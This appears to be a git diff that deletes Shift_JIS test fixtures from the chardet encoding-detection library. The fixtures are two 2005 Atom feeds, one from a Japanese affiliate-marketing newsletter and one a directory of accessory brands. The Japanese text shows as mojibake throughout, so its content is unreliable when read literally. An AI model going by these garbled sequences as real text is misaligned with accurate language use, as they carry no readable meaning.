-@info@1affliate.com - --------------------------------------------------------------------------- -@@@@@@‚ ‚ָ‚½‚×’m‚ח‚ָ‚¢30–‰~‰ׂ‚®ƒAƒtƒBƒƒGƒCƒg¬קp -@@@@@@@@@@@@@@|MAIL MAGAZINE\ --------------------------------------------------------------------------- - @”­s׃”CׂF@ˆֹ“¡“Nֶ - @”­s³F@@@‚©‚©‚ֱ‚ִ‚±‚¢IƒAƒtƒBƒƒGƒCƒg - @“–ƒƒ‹ƒ}ƒK‚ֹ‚ז‚ט¶‚¶‚י‘¹QEƒgƒ‰ƒuƒ‹“™‚ֹ‚ֲ‚¢‚ִ׃”C‚ֽ•‰‚¢‚‚¹‚סB - @‚²ˆ׃©E‚²´‘z‚ֽinfo@1affliate.com‚‚ֵ‚¨ט‚¢’v‚µ‚‚·I - @“o˜^E‰נ‚ֽ‚±‚¿‚ח‚±‚ח@http://www.mag2.com/m/0000146544.htm - --------------------------------------------------------------------------- -Copyright(C) 2004-2005 All Rights Reserved. --------------------------------------------------------------------------- ]]> - - - - -No.026 - -2005-12-07T06:42:04Z -2005-12-07T06:33:31Z -tag:1affliate.com,2005://1.300 -2005-12-07T06:33:31Z -ֵ‚י‚ֶƒcƒ‰ƒC‚ֵ‚·‚ז - -ˆֹ“¡ “Nֶ -http://1affliate.com -info@1affliate.com - -ƒoƒbƒNƒiƒ“ƒo[ - - - - -@ [@‚ ‚ָ‚½‚×’m‚ח‚ָ‚¢30–‰~‰ׂ‚®ƒAƒtƒBƒƒGƒCƒg¬קp @] - - vol.26 - - - - -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× -@s@¡‰ס‚ּ–@t -@ -@y‚Pz‚ֽ‚¶‚‚ּ‚ ‚¢‚³‚ֲw‹א—j”ֵ‚ּ”­s‚ּ‚¨’m‚ח‚¹x -@y‚Qz¡‰ס‚ּ¬קpwֵ‚י‚ֶƒcƒ‰ƒC‚ֵ‚·‚זx -@y‚Rz•ׂWד‹L -@ -@‚»‚ך‚ֵ‚ֽA‚ַ‚₪‚¼II@ - -@–ˆ“ת‚ּƒAƒtƒBƒƒGƒCƒg“‚נצJ‚µ‚ִ‚¢‚‚·II -@http://blog.livedoor.jp/affiliatemaseter/ -@w–w‚¹I300–‰~IIƒX[ƒp[ƒAƒtƒBƒƒGƒCƒ^[‚ײ‚ּ“¹x - -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× - - -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× -@y‚Pz‚ֽ‚¶‚‚ּ‚ ‚¢‚³‚ֲ -@@@@@@w‹א—j”ֵ”­s‚ּ‚¨’m‚ח‚¹x -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× - -‚±‚ס‚ֹ‚¿‚ֽAˆֹ“¡‚ֵ‚·B - -–ˆT‚P‰סA‰־—j“ת‚ֹ”zM‚³‚¹‚ִ’¸‚¢‚ִ‚¢‚½‚±‚ּƒƒ‹ƒ}ƒK‚ֵ‚·‚×A -¡T‚©‚חT‚Q‰סA‹א—j“ת‚ֹ‚א”­s‚³‚¹‚ִ’¸‚«‚‚·B - -‰־—j“ת‚ֽ¡‚‚ֵ‚ַ‚¨‚טAƒAƒtƒBƒƒGƒCƒgƒmƒEƒnƒE‚נו‘ּ‚ֹ‚µ‚½“א—eA -‹א—j“ת‚ֽ„‚©‚חƒAƒtƒBƒƒGƒCƒ^[‚ֵ‚ ‚י‚ ‚ָ‚½‚ײ‚ּƒƒbƒZ[ƒW‚נ -ו‘ּ‚ֹ‚µ‚½“א—e‚ֵ”zM’v‚µ‚‚·B - - -ˆָ‘OAƒƒbƒZ[ƒW«‚ּ‚‚¢ƒƒ‹ƒ}ƒK‚נ”­s‚µ‚½‚ֶ‚«‚ֹAל‚ס‚ֵ‚­‚ך‚½ -“ַׂ‚ּ•‚ב½‚©‚ֱ‚½‚ּ‚ֵAT‚P‰סA‚±‚ס‚ָƒƒ‹ƒ}ƒK‚נo‚µ‚ִ‚א‚¢‚¢‚©‚ָ‚ֶ -v‚¢A‚±‚ס‚ָ‚׃‚₪‚ֹ‚³‚¹‚ִ’¸‚«‚‚µ‚½B - -‚ ‚ח‚½‚‚ִA‚ז‚כ‚µ‚­‚¨ט‚¢‚µ‚‚·B - - -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× -@y‚Qz¡‰ס‚ּ¬קp -@@@@@@wֵ‚י‚ֶƒcƒ‰ƒC‚ֵ‚·‚זx -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× - -„‚ֽ‚±‚ך‚©‚חƒAƒtƒBƒƒGƒCƒg‚ֵ¬ק‚µ‚½‚¢‚ֶ‚¢‚₪l‚נ‚½‚­‚³‚ס’m‚ֱ‚ִ‚¢‚י -‚ּ‚ֵ‚·‚×A‚ָ‚©‚ֹ‚ֽh‚»‚₪‚ֹƒAƒtƒBƒƒGƒCƒg‚µ‚ִ‚¢‚יl‚א‚½‚­‚³‚ס‚¢‚‚·B - - -‚א‚ֶ‚א‚ֶAƒAƒtƒBƒƒGƒCƒg‚נn‚‚יl‚ֶ‚¢‚₪‚ּ‚ֽA‚¨‹א‚×—~‚µ‚¢‚ֶ‚¢‚₪ -ˆָO‚ֹ‚אA‚ֲ‚‚ח‚ָ‚¢‰ן׀d–‚נ«‚‚י‚«‚ֱ‚©‚¯‚ֹ‚µ‚½‚¢‚ֶ‚©A©•ּׂ -D‚«‚ָƒe[ƒ}‚ֵy‚µ‚­‰ׂ‚¬‚½‚¢‚ֶ‚¢‚₪–²‚נ‚ֱ‚ִn‚‚י‚±‚ֶ‚ב½‚¢‚ּ‚ֵ‚·‚× -‹C‚ֲׂ‚­‚ֶAƒAƒtƒBƒƒGƒCƒg©‘ּ‚׋ך‚µ‚¢‚א‚ּ‚ֹ‚ָ‚ֱ‚ִ‚¢‚½‚ט‚µ‚‚·B - -‚ ‚יˆ׃–¡‚א‚ֱ‚½‚¢‚ָ‚¢‚±‚ֶ‚ֵ‚·‚µA‚±‚ך‚¾‚ֶA‚א‚µ‰ׂ‚®‚±‚ֶ‚×o—ˆ‚½‚ֶ -‚µ‚ִ‚אA‰ן׀‚נ“]E‚µ‚½‚ז‚₪‚ָ‚א‚ּ‚ֵA‹‹ַAף‹µ‚ֽ•ֿ‚ם‚ט‚‚¹‚סB - -‚ֵ‚אA‘S‚ִ‚ּl‚ׂ±‚₪‚¢‚₪ף‹µ‚ֹ׳‚י‚ם‚¯‚ֵ‚ֽ‚ ‚ט‚‚¹‚סB -y‚µ‚­ƒAƒtƒBƒƒGƒCƒg‚µ‚ִ‚¢‚יl‚א‚½‚­‚³‚ס‚¢‚‚·B - -h‚»‚₪‚ָl‚ֶy‚µ‚»‚₪‚ָl‚ּˆב‚¢‚ֽ‰½‚©H - -“‚¦‚ֽ‹–ל‚ּˆב‚¢‚ֵ‚·B - - -’Pƒ–¾‰ץ‚ָ‚ּ‚ֵ‚·‚×Ah‚»‚₪‚ֹ‚µ‚ִ‚¢‚יl‚ֶ‚¢‚₪‚ּ‚ֽA’Z‚¢ƒXƒpƒ“‚ֵ -‚·‚®‚ֹ‹‰‚נo‚»‚₪‚ֶ‚µ‚ִ‚¢‚‚·B‚ֶ‚±‚כ‚×A‰½–‚אƒ}ƒXƒ^[‚·‚י -‚‚ֵ‚ֹ‚ֽװ‚ׂ©‚©‚ט‚‚·‚©‚חA‚»‚₪‚ֽ‚₪‚‚­‚¢‚«‚‚¹‚סB - -‚»‚±‚ֹ—‘z‚ֶ»ְ‚ּƒMƒƒƒbƒv‚×¶‚‚ך‚ִAh‚­‚ָ‚י‚ֶ‚¢‚₪‚ם‚¯‚ֵ‚·B - - -‚±‚±‚ֵA„‚×¾‚¢‚½‚¢‚ּ‚ֽAw’·‚¢װ©•װ‚ט‚ָ‚µ‚ֵ“w—ֽ‚·‚י‚±‚ֶ‚ֱ‚ִ -‚»‚ס‚ָ‚ֹ™‚ָ‚±‚ֶHx‚ֶ‚¢‚₪‚±‚ֶ‚ֵ‚·B - - -’·‚¢תװ‚ֶ‚¢‚ֱ‚ִ‚אA‚»‚ס‚ָ‚ֹ‚½‚¢‚µ‚½‚±‚ֶ‚ ‚ט‚‚¹‚סB -„‚ּך‡A‰½‚א’m‚ח‚ָ‚¢ף‹µ‚©‚חn‚‚‚µ‚½‚×A‚»‚ך‚ֵ‚א1”Nד‚ֹ‚ֽ -30–‰~‚®‚ח‚¢‚ֹ‚ֽ‚ָ‚ֱ‚ִ‚¢‚‚µ‚½B - -‚»‚ּ1”NװA3`5װ‚®‚ח‚¢‹x‚‚ָ‚µ‚ֵ‚¸‚ֱ‚ֶƒAƒtƒBƒƒGƒCƒg -‚µ‚ִ‚¢‚‚µ‚½‚×A‚±‚ך‚ֱ‚ִA‚»‚ס‚ָ‚ֹ‚½‚¢‚µ‚½‚±‚ֶ‚ֵ‚ֽ‚ ‚ט‚‚¹‚סB - -’†w¶‚ג‚Z¶‚×ף±•׳‹­‚·‚י‚ֶ‚«‚¾‚ֱ‚ִA‚±‚ך‚®‚ח‚¢‚µ‚‚·‚ז‚ֻB - -‘וwף±‚ֶ‚©‚¢‚ֱ‚½‚חA‚±‚ך‚ז‚ט‚ֽ‚י‚©‚ֹ‘½‚­‚ּװ‚ֶ˜J—ֽ‚נ -““‚µ‚ִ‚¢‚י‚ּ‚ֵ‚ֽ‚ָ‚¢‚ֵ‚µ‚ו‚₪‚©H - -‚»‚ך‚ֶ”ה‚׳‚½‚חA‘S‘Ry‚ֵ‚·B - - -‚¿‚ָ‚‚ֹA‘וw‚ּ˜b‚×o‚½‚ֲ‚¢‚ֵ‚ֹ‚¢‚¦‚־A‘וw‚נ‘²‹ֶ‚·‚י‚‚ֵ‚ֹ -4”Nװ‚©‚©‚ט‚‚·Bך–וwZE’Z‘ו‚ֵ‚א2”Nװ‚ֵ‚·B - -‚µ‚©‚אA‚±‚₪‚¢‚₪wZ‚ֱ‚ִA”Nװ”\–‰~‚ֶ‚¢‚₪צ‹ֶ—¿‚נ•¥‚ֱ‚ִ -‚¢‚­‚ס‚ֵ‚·‚ז‚ֻB - - -ƒAƒtƒBƒƒGƒCƒg‚ֵ‰ׂ‚²‚₪‚ֶv‚ֱ‚ִ“w—ֽ‚·‚י‚ֶ‚«‚ֹ‚ֽA‚¨‹א‚ֽ‚¢‚ט‚‚¹‚סB -•K—v‚ָ‚ּ‚ֽ©•ּׂ˜J—ֽ‚¾‚¯‚ֵ‚·B‚»‚ך‚ֵAwZ‚נ‘²‹ֶ‚·‚י‚ז‚ט -’Z‚¢װ‚ֵ‚₪‚‚­‚¢‚­B - - -‚±‚₪l‚¦‚י‚ֶAƒAƒtƒBƒƒGƒCƒg‚ֵ¬‰‚נo‚·‚‚ֵ“w—ֽ‚נ‘±‚¯‚י‚±‚ֶ‚ֽ -‚»‚ס‚ָ‚ֹ‚½‚¢‚µ‚½‚±‚ֶ‚ ‚ט‚‚¹‚סB - - -‚»‚ך‚®‚ח‚¢‚ּ‚ ‚¢‚¾A©•װ‚ט‚ָ‚µ‚ֵ“w—ֽ‚·‚י‚ּ‚ֱ‚ִA‚»‚ס‚ָ‚ֹ‘ו•ֿH - - -‘‹}‚ֹ‹‰‚נ’ַ‚¢‹‚‚ִ‚¢‚יl‚נ‚‚י‚ֶ‚»‚₪v‚¢‚‚·B - - -p‘±“I‚ֹ”­¶‚·‚י“¹‚נm—§‚·‚י‚±‚ֶ‚×o—ˆ‚י‚ס‚ֵ‚·B -‚»‚ּ‚½‚‚ֹ1”N‚ג2”N“w—ֽ‚µ‚½‚ֱ‚ִA‚¢‚¢‚ס‚¶‚ב‚ָ‚¢‚ֵ‚·‚©H - - -‹t‚ֹ‚¢‚¦‚־A“‚׸‚ֱ‚ִµ‚µ‚¢‚ֶ‚¢‚₪l‚ב‚¦‚ִ‚¢‚י‚ָ‚©‚ֵA -‚±‚ס‚ָ‚ֹƒIƒCƒVƒCv‚¢‚נ‚µ‚ז‚₪‚ֶ‚µ‚ִ‚¢‚י‚ּ‚ֵ‚·‚©‚חA‘½­l‚ז‚ט -“w—ֽ‚·‚י‚±‚ֶ‚ָ‚ס‚ִ“–‚½‚ט‘O‚ֵ‚·B - - -l‚ז‚ט‚¢‚¢v‚¢‚נ‚µ‚½‚¢B‚ֵ‚אA‚»‚ּ‘־‰¿‚ֽ•¥‚¢‚½‚­‚ָ‚¢B - -‚»‚ס‚ָl‚¦‚ֵ‚₪‚‚­‚¢‚­‚ם‚¯‚ׂ ‚ט‚‚¹‚סB -‚»‚₪‚¢‚ֱ‚½’‚ּ‚¢‚¢‚±‚ֶ‚נl‚¦‚ִ‚¢‚י‚©‚חA‹ך‚µ‚‚±‚ֶ‚ֹ‚ָ‚ט‚‚·B - - -‚¢‚ֲ‚‚ֵ‚אֳ‚¢–²‚־‚©‚ט‚‚ִ‚¢‚ָ‚¢‚ֵAƒLƒ`ƒ“‚ֶ»ף‚נ”cˆ¬‚µ‚ִ -oו‚נˆ‚‚יB‚»‚ך‚¾‚¯‚ֵA‹ך‚µ‚³‚©‚ח‚ֽ‰נ•ת‚³‚ך‚י‚ֽ‚¸‚ֵ‚·B - - -y‚µ‚ס‚ֵƒAƒtƒBƒƒGƒCƒg‚µ‚ִ‚¢‚יl‚ֶ‚¢‚₪‚ּ‚ֽA–ז‚ּ‚±‚ֶ‚ֹ -‚±‚¾‚ם‚ח‚¸A‚‚¸d–‚»‚ּ‚א‚ּ‚נy‚µ‚ס‚ֵ‚¢‚‚·B“‚ֽד‚©‚ח -‚ֲ‚¢‚ִ‚­‚י‚ֶ‚¢‚₪l‚¦‚ֵ‚·B - -‚»‚ך‚®‚ח‚¢‚ּ‚ה‚ֶ‚ט‚נ‚ֱ‚ִ‚ג‚י‚‚₪‚×A‚ֽ‚י‚©‚ֹ—Lˆ׃‹`‚ֵ‚·B - -‚ַ‚¿‚ח‚ׂ¢‚¢‚ּ‚©Al‚¦‚י‚‚ֵ‚א‚ָ‚¢‚ֶv‚¢‚‚·B -J‚ט•װ‚µ‚ֹ‚ָ‚ט‚‚·‚×A“w—ֽ‚·‚י‚ֶ‚¢‚ֱ‚ִ‚אA‚½‚¢‚µ‚½תװ‚ֵ‚ֽ -‚ ‚ט‚‚¹‚סB - - -14־A15־‚®‚ח‚¢‚ּq‹‚¾‚ֱ‚ִA‚Z“w‚ֶ‚¢‚₪–•W‚ּ‚½‚‚ֹ -–ˆ“ת‰½װ‚א•׳‹­‚µ‚ִ‚¢‚½‚ט‚µ‚‚·B - -‚¢‚¢‘וl‚×1“ת”װ“w—ֽ‚·‚י‚ּ‚׃cƒ‰ƒC‚ֶ‚©¾‚ֱ‚ִ‚¢‚½‚ח -־‚ם‚ך‚‚·B - -‚¢‚¢‰ֱ¸A–‚נo‚‚µ‚‚µ‚ו‚₪B -‚»‚ּ‚‚₪‚ׂז‚ֱ‚‚ַy‚µ‚¢‚ֵ‚·‚זII - - - -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× -¡“ת–{‰I@¬‰•״^‚ּƒAƒtƒBƒƒGƒCƒg’M‹³ˆח -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× - -„‚×ִC‚נ‚µ‚ִ‚¢‚יֲ•ƒRƒ“ƒTƒ‹ƒeƒBƒ“ƒO•t‚«‚ּ’Muְ‚ֵ‚·B -ףuתװi6ƒ–j“א‚ֹƒAƒtƒBƒƒGƒCƒg“‚×10–‰~‚נ’´‚¦‚י -ƒTƒCƒg‚נ\’z‚ֵ‚«‚ָ‚©‚ֱ‚½ך‡A6ƒ–װAuְ‚נ–³—¿‚ֵ‰„’· -‚ֵ‚«‚‚·B - -ְ’ט‚P‚O–¼‚ֵ•וW’†‚ֵ‚µ‚½‚×A•וWl”‚נ‘‚ג‚µ‚ִ‚‚µ‚¢‚ֶ‚¢‚₪÷‚ֹ -“‚¦‚ִ’טˆץ‚נ‚R‚O–¼‚ֹg‘ו‚µ‚‚µ‚½B - -ƒ€[ƒoƒuƒ‹ƒ^ƒCƒv‚ּ’u‚גƒeƒ“ƒvƒ[ƒgƒJƒXƒ^ƒ}ƒCƒY‚ּ–³—¿ƒTƒ|[ƒg‚א -ף‚¯‚ח‚ך‚י‚ז‚₪‚ֹ‚µ‚‚µ‚½B‚±‚ך‚ֵA‚g‚o‚ּל‚ט•‚ׂם‚©‚ח‚ָ‚¢‚ֶ‚¢‚₪ -•‚אˆְS‚µ‚ִAƒRƒ“ƒeƒ“ƒcל¬‚ֹW’†‚ֵ‚«‚‚·B - -http://www.tsurupea.com/ - - -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× -¡•ׂWד‹L@wƒpƒ\ƒRƒ“‚ּˆ׀—ֽx -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× - -—F’B‚ֹd–‚נט“`‚ֱ‚ִ‚א‚ח‚¨‚₪‚ֶv‚ֱ‚½‚ּ‚ֵ‚·‚×A‚»‚ּl‚ֱׂ‚ִ‚¢‚י -ƒpƒ\ƒRƒ“‚×–ס‚T”N‘O‚ּƒm[ƒgBƒEƒCƒ‹ƒXƒoƒXƒ^[‚נ—§‚¿ד‚°‚י‚ֶ -ƒƒ‚ƒ‚וs‘«‚·‚י‚ֶ‚¢‚₪A‚ֶ‚ס‚ֵ‚א‚ָ‚¢ƒpƒ\ƒRƒ“‚ֵ‚·Bi־j - -“–‘RAd–‚ֹ‚ָ‚ח‚¸AV‚µ‚¢ƒ‚ƒm‚נw“‚µ‚ָ‚¯‚ך‚־‚ֶ‘ו‘›‚¬‚µ‚ִ‚¢‚‚·B -‚T”N‘O‚ֶ‚¢‚¦‚־A‚¿‚ו‚ֱ‚ֶ‘O‚ּ˜b‚ּ‚ז‚₪‚ָ‹C‚ׂ·‚י‚ּ‚ֵ‚·‚×Aƒpƒ\ƒRƒ“‚ּ -i•א‚ֱ‚ִ‚·‚²‚¢‚ָ‚ֶ‚ ‚ח‚½‚‚ְִ´‚µ‚‚µ‚½B - -‚א‚ֽ‚גƒpƒ\ƒRƒ“‚ֱ‚ֱִ–ױ•i‚ֵ‚·‚ֻB - - -@‚²´‘zA‚²¿–ג‚ֽ‚±‚¿‚ח‚‚ֵ‚ַ‚₪‚¼B -@info@1affliate.com - --------------------------------------------------------------------------- -@@@@@@‚ ‚ָ‚½‚×’m‚ח‚ָ‚¢30–‰~‰ׂ‚®ƒAƒtƒBƒƒGƒCƒg¬קp -@@@@@@@@@@@@@@|MAIL MAGAZINE\ --------------------------------------------------------------------------- - @”­s׃”CׂF@ˆֹ“¡“Nֶ - @”­s³F@@@‚©‚©‚ֱ‚ִ‚±‚¢IƒAƒtƒBƒƒGƒCƒg - @“–ƒƒ‹ƒ}ƒK‚ֹ‚ז‚ט¶‚¶‚י‘¹QEƒgƒ‰ƒuƒ‹“™‚ֹ‚ֲ‚¢‚ִ׃”C‚ֽ•‰‚¢‚‚¹‚סB - @‚²ˆ׃©E‚²´‘z‚ֽinfo@1affliate.com‚‚ֵ‚¨ט‚¢’v‚µ‚‚·I - @“o˜^E‰נ‚ֽ‚±‚¿‚ח‚±‚ח@http://www.mag2.com/m/0000146544.htm - --------------------------------------------------------------------------- -Copyright(C) 2004-2005 All Rights Reserved. --------------------------------------------------------------------------- -]]> - - - - -
    \ No newline at end of file diff --git a/chardet/tests/SHIFT_JIS/accessories-brand.com.xml b/chardet/tests/SHIFT_JIS/accessories-brand.com.xml deleted file mode 100644 index 182a792..0000000 --- a/chardet/tests/SHIFT_JIS/accessories-brand.com.xml +++ /dev/null @@ -1,325 +0,0 @@ - - - -ƒAƒNƒZƒTƒ[ƒuƒ‰ƒ“ƒh‘ו«“T - -2005-12-21T11:01:46Z -ƒWƒ…ƒGƒ[EƒAƒNƒZƒTƒ[ƒuƒ‰ƒ“ƒh‚ּ׀‰מBצ®ƒTƒCƒgAײ˜Aמ•ס‚ָ‚ַB -tag:www.accessories-brand.com,2005://1 -Movable Type -Copyright (c) 2005, accessoriesbrand - -ƒuƒ‹[ƒ€(BLOOMj - -2005-12-21T11:10:29Z -2005-02-14T23:43:06Z -tag:www.accessories-brand.com,2005://1.153 -2005-02-14T23:43:06Z -¡צ®ƒTƒCƒg@ֻ@http://www.bloom.co.jp/ - -accessoriesbrand - -info@accessories-brand.com - -A@|@C - -¡צ®ƒTƒCƒg@ֻ@http://www.bloom.co.jp/

    ]]> - -
    -
    - -ƒoƒJƒ‰(Baccaratj - -2005-12-21T11:09:50Z -2005-02-14T23:45:16Z -tag:www.accessories-brand.com,2005://1.154 -2005-02-14T23:45:16Z -¡צ®ƒTƒCƒg@ֻ@http://www.baccarat.fr/ - -accessoriesbrand - -info@accessories-brand.com - -A@|@C - -¡צ®ƒTƒCƒg@ֻ@http://www.baccarat.fr/

    ]]> - -
    -
    - -ƒuƒ‰ƒCƒgƒ“(Brightonj - -2005-12-21T11:08:41Z -2005-02-14T23:47:33Z -tag:www.accessories-brand.com,2005://1.155 -2005-02-14T23:47:33Z -¡צ®ƒTƒCƒg@ֻ@http://www.brighton.com/ - -accessoriesbrand - -info@accessories-brand.com - -A@|@C - -¡צ®ƒTƒCƒg@ֻ@http://www.brighton.com/

    ]]> - -
    -
    - -ƒJƒƒƒA(CAMELLIAj - -2005-12-21T11:08:09Z -2005-02-14T23:49:44Z -tag:www.accessories-brand.com,2005://1.156 -2005-02-14T23:49:44Z -¡צ®ƒTƒCƒg@ֻ@http://www.mikicorp.co.jp/ - -accessoriesbrand - -info@accessories-brand.com - -A@|@C - -¡צ®ƒTƒCƒg@ֻ@http://www.mikicorp.co.jp/

    ]]> - -
    -
    - -ƒJƒƒ‰@ƒC@ƒJƒƒ‰(CARRERA Y CARRERAj - -2005-12-21T11:07:34Z -2005-02-14T23:51:44Z -tag:www.accessories-brand.com,2005://1.157 -2005-02-14T23:51:44Z -¡צ®ƒTƒCƒg@ֻ@http://www.carreraycarrera.com/ - -accessoriesbrand - -info@accessories-brand.com - -A@|@C - -¡צ®ƒTƒCƒg@ֻ@http://www.carreraycarrera.com/

    ]]> - -
    -
    - -ƒLƒƒ“ƒg(CHIMENTOj - -2005-12-21T11:06:56Z -2005-02-14T23:53:15Z -tag:www.accessories-brand.com,2005://1.158 -2005-02-14T23:53:15Z -¡צ®ƒTƒCƒg@ֻ@http://www.chimento.it/ - -accessoriesbrand - -info@accessories-brand.com - -A@|@C - -¡צ®ƒTƒCƒg@ֻ@http://www.chimento.it/

    ]]> - -
    -
    - -ƒVƒ‡ƒp[ƒ‹(Chopardj - -2005-12-21T11:06:24Z -2005-02-14T23:55:06Z -tag:www.accessories-brand.com,2005://1.159 -2005-02-14T23:55:06Z -¡צ®ƒTƒCƒg@ֻ@http://www.chopard.com/worldwide/indexfl.html - -accessoriesbrand - -info@accessories-brand.com - -A@|@C - -¡צ®ƒTƒCƒg@ֻ@http://www.chopard.com/worldwide/indexfl.html

    ]]> - -
    -
    - -ƒNƒƒIƒuƒ‹[(ClioBluej - -2005-12-21T11:05:50Z -2005-02-14T23:56:38Z -tag:www.accessories-brand.com,2005://1.160 -2005-02-14T23:56:38Z -¡צ®ƒTƒCƒg@ֻ@http://www.clioblue.com/ - -accessoriesbrand - -info@accessories-brand.com - -A@|@C - -¡צ®ƒTƒCƒg@ֻ@http://www.clioblue.com/

    ]]> - -
    -
    - -ƒNƒƒA[ƒY(Claire'sj - -2005-12-21T11:05:16Z -2005-02-14T23:58:21Z -tag:www.accessories-brand.com,2005://1.161 -2005-02-14T23:58:21Z -¡צ®ƒTƒCƒg@ֻ@http://www.claires.com/ - -accessoriesbrand - -info@accessories-brand.com - -A@|@C - -¡צ®ƒTƒCƒg@ֻ@http://www.claires.com/

    ]]> - -
    -
    - -ƒNƒVƒ…ƒJ(cushkaj - -2005-12-21T11:04:39Z -2005-02-15T00:00:03Z -tag:www.accessories-brand.com,2005://1.162 -2005-02-15T00:00:03Z -¡צ®ƒTƒCƒg@ֻ@http://www.bigi.co.jp/ - -accessoriesbrand - -info@accessories-brand.com - -A@|@C - -¡צ®ƒTƒCƒg@ֻ@http://www.bigi.co.jp/

    ]]> - -
    -
    - -ƒR[ƒ`(COACHj - -2005-12-21T11:04:09Z -2005-02-15T00:01:52Z -tag:www.accessories-brand.com,2005://1.163 -2005-02-15T00:01:52Z -¡צ®ƒTƒCƒg@ֻ@http://www.coach.com/ - -accessoriesbrand - -info@accessories-brand.com - -A@|@C - -¡צ®ƒTƒCƒg@ֻ@http://www.coach.com/

    ]]> - -
    -
    - -ƒNƒ[ƒWƒ…(courregesj - -2005-12-21T11:03:39Z -2005-02-15T00:03:40Z -tag:www.accessories-brand.com,2005://1.164 -2005-02-15T00:03:40Z -¡צ®ƒTƒCƒg@ֻ@http://www.courreges.fr/ - -accessoriesbrand - -info@accessories-brand.com - -A@|@C - -¡צ®ƒTƒCƒg@ֻ@http://www.courreges.fr/

    ]]> - -
    -
    - -ƒJƒEƒRƒyƒ“ƒn[ƒQƒ“(Calvin Kleinj - -2005-12-21T11:03:02Z -2005-02-15T00:06:49Z -tag:www.accessories-brand.com,2005://1.165 -2005-02-15T00:06:49Z -¡צ®ƒTƒCƒg@ֻ@ http://www.carre.dk/ - -accessoriesbrand - -info@accessories-brand.com - -A@|@C - -¡צ®ƒTƒCƒg@ֻ@ http://www.carre.dk/

    ]]> - -
    -
    - -ƒRƒƒbƒgƒ}ƒ‹[ƒt(colette maloufj - -2005-12-21T11:02:24Z -2005-02-15T00:08:39Z -tag:www.accessories-brand.com,2005://1.166 -2005-02-15T00:08:39Z -¡צ®ƒTƒCƒg@ֻ@http://www.colettemalouf.com/index.html - -accessoriesbrand - -info@accessories-brand.com - -A@|@C - -¡צ®ƒTƒCƒg@ֻ@http://www.colettemalouf.com/index.html

    ]]> - -
    -
    - -“cט^ל(TASAKIj - -2005-12-21T11:01:46Z -2005-02-15T12:34:43Z -tag:www.accessories-brand.com,2005://1.167 -2005-02-15T12:34:43Z - ‘ו©‘R‚ּ‰c‚‚©‚ח¶‚o‚³‚ך‚יw^לx‚נ‚±‚ז‚ָ‚­ˆ₪‚µA‘n‹ֶˆָ—ˆA—{B‚©‚ח‰ֱHE”ּ”„‚ֹ‚יˆךׁ‘ּ§‚ּ‰÷Aƒ_ƒCƒ„ƒ‚ƒ“ƒh‚גF־‚ֶ‹₪‚ֹA‚»‚ּ”‚µ‚³‚נ¢E’†‚ּlX‚¨“ֽ‚¯‚ִ‚¢‚יB “ֱ‚ֹ3־‚ּƒ_ƒCƒ„ƒ‚ƒ“ƒh‚׃Xƒ‰ƒCƒh‚·‚יAuƒgƒƒƒW[EƒXƒ‰ƒCƒhƒ_ƒCƒ„ƒ‚ƒ“ƒhƒVƒ[ƒYv‚ֽƒ_ƒCƒ„•”•ׂנy‚­‰‚³‚¦‚י‚±‚ֶ‚ֵƒ`ƒF[ƒ“‚ֹ•‰’S‚נ‚©... - -accessoriesbrand - -info@accessories-brand.com - -S@|@U - - ‘ו©‘R‚ּ‰c‚‚©‚ח¶‚o‚³‚ך‚יw^לx‚נ‚±‚ז‚ָ‚­ˆ₪‚µA‘n‹ֶˆָ—ˆA -—{B‚©‚ח‰ֱHE”ּ”„‚ֹ‚יˆךׁ‘ּ§‚ּ‰÷Aƒ_ƒCƒ„ƒ‚ƒ“ƒh‚גF־‚ֶ‹₪‚ֹA‚»‚ּ”‚µ‚³‚נ¢E’†‚ּlX‚¨“ֽ‚¯‚ִ‚¢‚יB -“ֱ‚ֹ3־‚ּƒ_ƒCƒ„ƒ‚ƒ“ƒh‚׃Xƒ‰ƒCƒh‚·‚יAuƒgƒƒƒW[EƒXƒ‰ƒCƒhƒ_ƒCƒ„ƒ‚ƒ“ƒhƒVƒ[ƒYv -‚ֽƒ_ƒCƒ„•”•ׂנy‚­‰‚³‚¦‚י‚±‚ֶ‚ֵƒ`ƒF[ƒ“‚ֹ•‰’S‚נ‚©‚¯‚¸ƒ_ƒCƒ„•”•ׂנˆ“®‚³‚¹‚י‚±‚ֶ‚ֵׂ‚«A -©—R©‚ּƒAƒƒ“ƒW‚×y‚µ‚‚יƒ^ƒTƒLƒIƒƒWƒiƒ‹‚ּ‘וƒqƒbƒgƒWƒ…ƒGƒ[B
    -
    -„‚ּ‰‹¥»¥–¢—ˆ‚׋P‚­ TRILOGY(ƒgƒƒƒW[)@w“‚ֽ‚±‚¿‚ח -

    - ¡צ®ƒTƒCƒg@ֻ@ -http://www.tasaki.co.jp/

    ]]> - -
    -
    - -
